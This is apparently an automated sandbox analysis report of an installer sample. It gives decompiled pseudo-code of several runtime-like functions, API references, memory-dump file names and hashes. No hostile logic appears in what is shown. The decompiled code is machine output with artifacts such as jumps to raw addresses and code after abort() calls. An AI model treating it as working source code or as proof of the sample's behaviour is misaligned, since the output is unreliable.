Instruction Fuzzy Hash: 28D012B1D4A30956C120FFA5114107AF1BADA8778CF553C2FB804335325A6CDD41859F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8E9, Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040E8E9(void* __eax) {
				void* _t40;
				void* _t45;
				void* _t48;
				intOrPtr _t49;
				signed int _t55;
				void* _t58;
				signed int _t60;
				signed int _t61;
				intOrPtr _t63;
				signed char _t66;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				intOrPtr _t84;
				signed int _t86;
				void* _t88;
				intOrPtr _t89;
				intOrPtr* _t92;
				intOrPtr* _t94;

				_t40 = __eax;
				if(__eax != 2) {
					abort();
					_push(_t88);
					_t89 = _t68;
					_t84 = _t63;
					_t58 = _t40;
					memset(_t58, 0, 0x20 << 2);
					_t94 = _t92 - 0xec + 0xc;
					 *((intOrPtr*)(_t58 + 0x60)) = 0x40000000;
					 *((intOrPtr*)(_t58 + 0x4c)) =  *((intOrPtr*)(_t94 + 0xfc));
					_t45 = E0040DBA0(_t58, _t94 + 0x20);
					if (_t45 != 0) goto 0x498c80;
					 *((intOrPtr*)(_t94 + 4)) = 0x40db20;
					 *_t94 = 0x4e64d4;
					L0041B748();
					if(_t45 != 0) {
						if( *0x4e64d8 == 0) {
							 *0x4e64d8 = 4;
							 *0x4e64da = 4;
							 *0x4e64d9 = 4;
							 *0x4e64db = 4;
							 *0x4e64de = 4;
							 *0x4e64df = 4;
							 *0x4e64dd = 4;
							 *0x4e64dc = 4;
							 *0x4e64e3 = 0xc;
							 *0x4e64e4 = 0xc;
							 *0x4e64e5 = 0xc;
							 *0x4e64e6 = 0xc;
							 *0x4e64e7 = 0xc;
							 *0x4e64e8 = 0xc;
							 *0x4e64e1 = 4;
							 *0x4e64e0 = 4;
						}
					}
					if ( *0x4e64dc != 4) goto 0x498c80;
					 *((intOrPtr*)(_t94 + 0x1c)) = _t89;
					if(( *(_t58 + 0x63) & 0x00000040) != 0) {
						 *((char*)(_t58 + 0x70)) = 0;
					}
					 *((intOrPtr*)(_t94 + 0xc0)) = 1;
					 *((intOrPtr*)(_t58 + 0x10)) = _t94 + 0x1c;
					 *((intOrPtr*)(_t94 + 0xb8)) = 4;
					 *((intOrPtr*)(_t94 + 0xb4)) = 0;
					_t48 = E0040E840(_t58, _t94 + 0x20);
					 *((intOrPtr*)(_t58 + 0x4c)) = _t84;
					return _t48;
				} else {
					_t49 =  *((intOrPtr*)(_t88 + 0x9c));
					_t86 = 0;
					_t66 = 0;
					do {
						_t49 = _t49 + 1;
						_t60 =  *(_t49 - 1) & 0x000000ff;
						_t73 = (_t60 & 0x0000007f) << _t66;
						_t66 = _t66 + 7;
						_t86 = _t86 | _t73;
					} while (_t60 < 0);
					 *_t92 = 0;
					 *((intOrPtr*)(_t92 + 0x1c)) = E0040E1C0(_t49, _t92 + 0x30, _t49 + _t86);
					_t61 = 0;
					 *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x18)) + 0x48)) =  *((intOrPtr*)(_t92 + 0x1c));
					while( *(_t88 + 4 + _t61 * 8) > 5) {
						_t61 = _t61 + 1;
						if(_t61 != 0x12) {
							continue;
						}
						_t75 =  *( *((intOrPtr*)(_t92 + 0x18)) + 0x60);
						_t55 = _t75 & 0x7fffffff;
						if( *((char*)(_t88 + 0xbb)) != 0) {
							_t55 = _t75 | 0x80000000;
						}
						 *( *((intOrPtr*)(_t92 + 0x18)) + 0x60) = _t55;
						return _t55;
						goto L19;
					}
					goto ( *((intOrPtr*)(0x4a4fe0 +  *(_t88 + 4 + _t61 * 8) * 4)));
				}
				L19:
			}

0x0040e8e9
0x0040e8f3
0x0040eb10
0x0040eb20
0x0040eb21
0x0040eb25
0x0040eb2d
0x0040eb39
0x0040eb39
0x0040eb3b
0x0040eb4d
0x0040eb52
0x0040eb59
0x0040eb5f
0x0040eb67
0x0040eb6e
0x0040eb75
0x0040ebda
0x0040ebdc
0x0040ebe3
0x0040ebea
0x0040ebf1
0x0040ebf8
0x0040ebff
0x0040ec06
0x0040ec0d
0x0040ec14
0x0040ec1b
0x0040ec22
0x0040ec29
0x0040ec30
0x0040ec37
0x0040ec3e
0x0040ec45
0x0040ec45
0x0040ebda
0x0040eb7e
0x0040eb84
0x0040eb8c
0x0040eb8e
0x0040eb8e
0x0040eb9a
0x0040eba5
0x0040ebaa
0x0040ebb5
0x0040ebc0
0x0040ebc5
0x0040ebd2
0x0040e8f9
0x0040e8f9
0x0040e8ff
0x0040e901
0x0040e903
0x0040e903
0x0040e906
0x0040e90f
0x0040e911
0x0040e914
0x0040e916
0x0040e91a
0x0040e92d
0x0040e939
0x0040e93b
0x0040e940
0x0040e973
0x0040e979
0x00000000
0x00000000
0x0040e97f
0x0040e984
0x0040e990
0x0040e994
0x0040e994
0x0040e99d
0x0040e9aa
0x00000000
0x0040e9aa
0x0040e94b
0x0040e94b
0x00000000

APIs

abort.MSVCRT ref: 0040EB10
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 24f4986ec5fae62f4a97d228651fd9ec53c43e45559151e0ce4bc7b7ba04be3e
Instruction ID: a30c61202d8e2fd4069c00006e6809dfaa9ba0bd013d9c628b0ebced3107e49c
Opcode Fuzzy Hash: 24f4986ec5fae62f4a97d228651fd9ec53c43e45559151e0ce4bc7b7ba04be3e
Instruction Fuzzy Hash: AF51F8B19087518FD710CF19C08075ABBE1FF85368F194C6EE8D56B392C379A859CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB20, Relevance: 16.6, APIs: 11, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EB20(void* __eax, intOrPtr __ecx, char __edx) {
				intOrPtr _v0;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v220;
				char _v224;
				intOrPtr _v248;
				void* _t24;
				void* _t27;
				void* _t29;
				intOrPtr _t39;
				char _t40;
				void* _t41;

				_t40 = __edx;
				_t39 = __ecx;
				_t29 = __eax;
				memset(__eax, 0, 0x20 << 2);
				 *((intOrPtr*)(_t29 + 0x60)) = 0x40000000;
				 *((intOrPtr*)(_t29 + 0x4c)) = _v0;
				_t24 = E0040DBA0(_t29,  &_v220);
				if (_t24 != 0) goto 0x498c80;
				_v248 = 0x40db20;
				 *((intOrPtr*)(_t41 - 0xec + 0xc)) = 0x4e64d4;
				L0041B748();
				if(_t24 != 0) {
					if( *0x4e64d8 == 0) {
						 *0x4e64d8 = 4;
						 *0x4e64da = 4;
						 *0x4e64d9 = 4;
						 *0x4e64db = 4;
						 *0x4e64de = 4;
						 *0x4e64df = 4;
						 *0x4e64dd = 4;
						 *0x4e64dc = 4;
						 *0x4e64e3 = 0xc;
						 *0x4e64e4 = 0xc;
						 *0x4e64e5 = 0xc;
						 *0x4e64e6 = 0xc;
						 *0x4e64e7 = 0xc;
						 *0x4e64e8 = 0xc;
						 *0x4e64e1 = 4;
						 *0x4e64e0 = 4;
					}
				}
				if ( *0x4e64dc != 4) goto 0x498c80;
				_v224 = _t40;
				if(( *(_t29 + 0x63) & 0x00000040) != 0) {
					 *((char*)(_t29 + 0x70)) = 0;
				}
				_v60 = 1;
				 *((intOrPtr*)(_t29 + 0x10)) =  &_v224;
				_v68 = 4;
				_v72 = 0;
				_t27 = E0040E840(_t29,  &_v220);
				 *((intOrPtr*)(_t29 + 0x4c)) = _t39;
				return _t27;
			}

0x0040eb21
0x0040eb25
0x0040eb2d
0x0040eb39
0x0040eb3b
0x0040eb4d
0x0040eb52
0x0040eb59
0x0040eb5f
0x0040eb67
0x0040eb6e
0x0040eb75
0x0040ebda
0x0040ebdc
0x0040ebe3
0x0040ebea
0x0040ebf1
0x0040ebf8
0x0040ebff
0x0040ec06
0x0040ec0d
0x0040ec14
0x0040ec1b
0x0040ec22
0x0040ec29
0x0040ec30
0x0040ec37
0x0040ec3e
0x0040ec45
0x0040ec45
0x0040ebda
0x0040eb7e
0x0040eb84
0x0040eb8c
0x0040eb8e
0x0040eb8e
0x0040eb9a
0x0040eba5
0x0040ebaa
0x0040ebb5
0x0040ebc0
0x0040ebc5
0x0040ebd2

APIs

Part of subcall function 0040DBA0: strlen.MSVCRT ref: 0040DC23

abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort$strlen
String ID:
API String ID: 2656325428-0
Opcode ID: e9dcf72f3a185e6ca887a32038a0920009c27bb7993d5cbe4e1fbd3cb98b99c1
Instruction ID: c18e68560f11b2cb83c0040ccfbcdf286556c90631e836bffeb466592a610030
Opcode Fuzzy Hash: e9dcf72f3a185e6ca887a32038a0920009c27bb7993d5cbe4e1fbd3cb98b99c1
Instruction Fuzzy Hash: 01316DB08083C4DAE721DB29E9847567FD56BA2388F05447ED6845F2E3D3BA8408C76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC60, Relevance: 15.0, APIs: 10, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EC60(void* __eax, void* __ecx, void* __edx) {
				signed int _t17;
				void* _t18;
				signed int _t20;
				intOrPtr* _t22;
				void* _t23;

				_t23 = __edx;
				_t18 = __eax;
				E0040E840(__eax, __edx);
				_t17 =  *(_t23 + 0xb4);
				if( *((intOrPtr*)(_t23 + 4 + _t17 * 8)) != 6) {
					if (_t17 - 0x11 > 0) goto 0x498c85;
					_t20 =  *(_t17 + 0x4e64d8) & 0x000000ff;
					_t22 =  *((intOrPtr*)(_t18 + _t17 * 4));
					if(( *(_t18 + 0x63) & 0x00000040) == 0 ||  *((char*)(_t18 + _t17 + 0x6c)) == 0) {
						if (_t20 != 4) goto 0x498c85;
						_t22 =  *_t22;
					}
					 *((intOrPtr*)(_t18 + 0x4c)) = _t22;
					return _t17;
				} else {
					 *((intOrPtr*)(_t18 + 0x4c)) = 0;
					return _t17;
				}
			}

0x0040ec61
0x0040ec64
0x0040ec69
0x0040ec6e
0x0040ec79
0x0040ec93
0x0040ec99
0x0040eca0
0x0040eca7
0x0040ecb3
0x0040ecb9
0x0040ecb9
0x0040ecbb
0x0040ecc3
0x0040ec7b
0x0040ec7b
0x0040ec87
0x0040ec87

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85574c7bad8589e636c8ca32d7ac733a394a22def1505879de154ce28031d69e
Instruction ID: c2f35d4d9c3ff0181a329c8880a058b4697d7c9de2c63be51be43dae0fdb219b
Opcode Fuzzy Hash: 85574c7bad8589e636c8ca32d7ac733a394a22def1505879de154ce28031d69e
Instruction Fuzzy Hash: 1CF0C8B08051004AFB20AF1AA0853737BA1AB4232CF4848ABD9412B297D67D98948A8E

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECD0, Relevance: 13.6, APIs: 9, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E0040ECD0(intOrPtr* __eax, intOrPtr* __ecx, void* __edx) {
				intOrPtr* _v52;
				char _v220;
				intOrPtr* _v224;
				intOrPtr _v248;
				intOrPtr* _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				signed int _v264;
				intOrPtr* _v320;
				char _v488;
				intOrPtr* _v492;
				intOrPtr _v496;
				intOrPtr* _v500;
				intOrPtr _v512;
				void* _v516;
				intOrPtr* _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr* _t50;
				void* _t53;
				intOrPtr _t54;
				void* _t61;
				void* _t72;
				intOrPtr* _t73;
				intOrPtr* _t79;
				void* _t80;
				intOrPtr* _t81;
				void* _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t96;
				signed int _t99;
				intOrPtr _t100;
				void* _t102;
				void* _t103;
				intOrPtr* _t104;
				intOrPtr* _t105;

				_t93 = 1;
				_t95 = __eax;
				_t72 = __edx;
				_t104 = _t103 - 0xfc;
				_v224 = __ecx;
				while(1) {
					_t50 = E0040DBA0(_t72,  &_v220);
					_t87 =  *((intOrPtr*)(_t72 + 0x48)) - ( *(_t72 + 0x60) >> 0x1f);
					_t99 = (0 |  *((intOrPtr*)(_t95 + 0x10)) == _t87) << 2;
					if(_t50 != 0) {
						break;
					}
					_t79 = _v52;
					if(_t79 == 0) {
						L4:
						if(_t99 != 0) {
							_push(_t99);
							_push(_t93);
							_t94 = 1;
							_push(_t95);
							_t96 = _t87;
							_push(_t72);
							_t73 = _t50;
							_t105 = _t104 - 0xfc;
							_t100 =  *((intOrPtr*)(_t73 + 0x10));
							_v492 = _t79;
							_v500 =  *((intOrPtr*)(_t50 + 0xc));
							_v496 = _t100;
							while(1) {
								_t53 = E0040DBA0(_t96,  &_v488);
								_t80 = _t53;
								if(_t53 != 0 && _t53 != 5) {
									break;
								}
								_t54 =  *_t73;
								_t89 =  *((intOrPtr*)(_t73 + 4));
								if(_t80 != 5) {
									_v528 = _t54;
									_v512 = _t100;
									_v516 = _t96;
									_v520 = _t73;
									_v524 = _t89;
									_v532 = 0xa;
									 *_t105 = 1;
									if( *_v500() != 0) {
										break;
									} else {
										_t81 = _v320;
										if(_t81 == 0) {
											L16:
											_t94 = _t94 + 1;
											E0040EC60(_t96, _t81,  &_v488);
											continue;
										} else {
											_v516 = _t96;
											_v520 = _t73;
											_v528 =  *_t73;
											_v524 =  *((intOrPtr*)(_t73 + 4));
											_v532 = 0xa;
											 *_t105 = 1;
											_t61 =  *_t81();
											if(_t61 == 7) {
												_t102 = _t61;
												goto L23;
											} else {
												if(_t61 != 8) {
													break;
												} else {
													goto L16;
												}
											}
										}
									}
								} else {
									_t102 = _t80;
									_v528 = _t54;
									_v516 = _t96;
									_v512 = _v496;
									_v520 = _t73;
									_v524 = _t89;
									_v532 = 0x1a;
									 *_t105 = 1;
									if( *_v500() == 0) {
										L23:
										 *_v492 = _t94;
										return _t102;
									} else {
										break;
									}
								}
								goto L24;
							}
							return 2;
						} else {
							_t93 = _t93 + 1;
							E0040EC60(_t72, _t79,  &_v220);
							continue;
						}
					} else {
						_v248 = _t72;
						_v252 = _t95;
						_t87 =  *((intOrPtr*)(_t95 + 4));
						 *_t104 = 1;
						_v260 =  *_t95;
						_v256 = _t87;
						_v264 = _t99 | 0x00000002;
						_t50 =  *_t79();
						if(_t50 == 7) {
							 *_v224 = _t93;
							return _t50;
						} else {
							if(_t50 != 8) {
								break;
							} else {
								goto L4;
							}
						}
					}
					L24:
				}
				return 2;
				goto L24;
			}

0x0040ecd2
0x0040ecd8
0x0040ecdb
0x0040ecdd
0x0040ece3
0x0040ed3e
0x0040ed44
0x0040ed54
0x0040ed60
0x0040ed65
0x00000000
0x00000000
0x0040ecf0
0x0040ecf9
0x0040ed2c
0x0040ed2e
0x0040eda0
0x0040eda1
0x0040eda2
0x0040eda7
0x0040eda8
0x0040edaa
0x0040edab
0x0040edad
0x0040edb6
0x0040edb9
0x0040edbd
0x0040edc1
0x0040ee4a
0x0040ee50
0x0040ee55
0x0040ee59
0x00000000
0x00000000
0x0040ee60
0x0040ee62
0x0040ee68
0x0040edd0
0x0040edd8
0x0040eddc
0x0040ede0
0x0040ede4
0x0040ede8
0x0040edf0
0x0040edfb
0x00000000
0x0040ee01
0x0040ee01
0x0040ee0a
0x0040ee3c
0x0040ee42
0x0040ee45
0x00000000
0x0040ee0c
0x0040ee11
0x0040ee15
0x0040ee19
0x0040ee1d
0x0040ee21
0x0040ee29
0x0040ee30
0x0040ee35
0x0040eeb3
0x00000000
0x0040ee37
0x0040ee3a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ee3a
0x0040ee35
0x0040ee0a
0x0040ee6e
0x0040ee6e
0x0040ee74
0x0040ee78
0x0040ee80
0x0040ee84
0x0040ee88
0x0040ee8c
0x0040ee94
0x0040ee9f
0x0040eeb5
0x0040eeb9
0x0040eec7
0x00000000
0x00000000
0x00000000
0x0040ee9f
0x00000000
0x0040ee68
0x0040eeb2
0x0040ed30
0x0040ed36
0x0040ed39
0x00000000
0x0040ed39
0x0040ecfb
0x0040ecfb
0x0040ecff
0x0040ed05
0x0040ed08
0x0040ed0f
0x0040ed18
0x0040ed1c
0x0040ed20
0x0040ed25
0x0040ed84
0x0040ed90
0x0040ed27
0x0040ed2a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ed2a
0x0040ed25
0x00000000
0x0040ecf9
0x0040ed76
0x00000000

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: f082330678c98d119cf8e9a7e8370b1c19f3f875e5298bee3452066619ef8778
Instruction ID: 68609cead8b65babb622a1c34cbc6f30837a2cdee364c59c8230815a56c47fb0
Opcode Fuzzy Hash: f082330678c98d119cf8e9a7e8370b1c19f3f875e5298bee3452066619ef8778
Instruction Fuzzy Hash: E811D271A193058BD724EF6AD48166BB3E5EFC4304F108D3FE888A3381D679D8448B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00410B10, Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f705e321b25543be31d2a27c7409790c34706a1552170f31c16739bd39c0eeb
Instruction ID: 05cf05f083844d1f4a755a9f6166e2dcf8f810cb46e264dec83df57306710d5c
Opcode Fuzzy Hash: 9f705e321b25543be31d2a27c7409790c34706a1552170f31c16739bd39c0eeb
Instruction Fuzzy Hash: 21514070608709DFC710EF65D48059ABBE4FF85748F11892EE5898B311E778E984CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C6B0, Relevance: 10.6, APIs: 7, Instructions: 54fileCOMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,474E5543,?,00492D80,?,?,?,?,?,?,0049636F,?,?,?,?), ref: 004972E8
abort.MSVCRT(?,?,474E5543,?,00492D80,?,?,?,?,?,?,0049636F,?,?,?,?), ref: 004972F5
fwrite.MSVCRT ref: 00497353
fputs.MSVCRT ref: 00497368
fputc.MSVCRT ref: 00497381
abort.MSVCRT ref: 0049738B
??3@YAXPAX@Z.MSVCRT ref: 00497393

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort$??3@fputcfputsfwrite
String ID:
API String ID: 226694830-0
Opcode ID: a493c3c3e86470be979a37fa60f8c008ba4c19b47b0e2734706191f50756578d
Instruction ID: 4f918c1643f5002c146e415c410a15988f2e9e0cda5c2e2b8a4dd7efb4934ad6
Opcode Fuzzy Hash: a493c3c3e86470be979a37fa60f8c008ba4c19b47b0e2734706191f50756578d
Instruction Fuzzy Hash: 3611FEB0919704AACB107FB6804626DBEE1AF4534CF02587FF4C957242DB7C84809B9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040F050, Relevance: 10.5, APIs: 7, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F050(intOrPtr _a4, signed int _a8) {
				intOrPtr* _t11;
				signed int _t13;
				intOrPtr _t14;
				signed int _t15;

				_t15 = _a8;
				_t14 = _a4;
				if (_t15 - 0x11 > 0) goto 0x498c94;
				_t13 =  *(_t15 + 0x4e64d8) & 0x000000ff;
				_t11 =  *((intOrPtr*)(_t14 + _t15 * 4));
				if(( *(_t14 + 0x63) & 0x00000040) != 0) {
					if( *((char*)(_t14 + _t15 + 0x6c)) == 0) {
						goto L1;
					} else {
						return _t11;
					}
				} else {
					L1:
					if (_t13 != 4) goto 0x498c94;
					return  *_t11;
				}
			}

0x0040f054
0x0040f058
0x0040f05f
0x0040f065
0x0040f06c
0x0040f073
0x0040f08a
0x00000000
0x0040f090
0x0040f090
0x0040f090
0x0040f075
0x0040f075
0x0040f078
0x0040f084
0x0040f084

APIs

abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a3569d264d2d6853eee0edbe13d9a920f5dac28f6c47d3170fb2bcea21085139
Instruction ID: d9f9f033acb8186e98194e6f55151efb4f4357d7a1975cb5bd598e8ae801f8a9
Opcode Fuzzy Hash: a3569d264d2d6853eee0edbe13d9a920f5dac28f6c47d3170fb2bcea21085139
Instruction Fuzzy Hash: D1F0ECF0D151452BD610EF54848127577A16B4735CF9814BFF440276D3D32D9499C76E

Uniqueness

Uniqueness Score: -1.00%

Function 00429A70, Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 199stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00429A96
memcmp.MSVCRT ref: 00429ABA
memcmp.MSVCRT ref: 00429B2B
memcmp.MSVCRT ref: 00429B9D

Part of subcall function 00491D20: strlen.MSVCRT ref: 00491D2E

memcmp.MSVCRT ref: 00429C25

Strings

"%J, xrefs: 00429C82

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: memcmp$strlen
String ID: "%J
API String ID: 3738950036-3128046581
Opcode ID: a6d8037aab0f5f40e55ff17d822ce6f5585333cd1edbd07c0ff01dcda3a4bba7
Instruction ID: 334ee52981271bfa3adf88a43ef16f4981f4f8bfcc65c41ffde6e119a6482a3e
Opcode Fuzzy Hash: a6d8037aab0f5f40e55ff17d822ce6f5585333cd1edbd07c0ff01dcda3a4bba7
Instruction Fuzzy Hash: D9614971609311AFC700AF29D58040AFBE1FED9788F54C92EE98887315D375EC459B9A

Uniqueness

